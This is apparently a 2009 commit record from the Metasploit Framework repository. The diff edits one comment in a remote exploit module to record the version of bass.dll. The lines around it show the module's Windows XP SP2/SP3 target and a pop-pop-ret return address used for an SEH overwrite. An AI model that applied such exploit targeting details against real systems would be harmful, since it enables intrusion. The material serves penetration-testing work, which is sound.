note file version

git-svn-id: file:///home/svn/framework3/trunk@7820 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2009-12-10 23:23:16 +00:00
parent dea639229b
commit 95f9c1dacf
1 changed files with 1 additions and 1 deletions

View File

@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll
[ 'Windows XP SP2 / SP3', { 'Ret' => 0x1000a4fd } ], # pop pop ret => bass.dll v2.3.0.2
],
'Privileged' => false,
'DisclosureDate' => 'Aug 19 2009',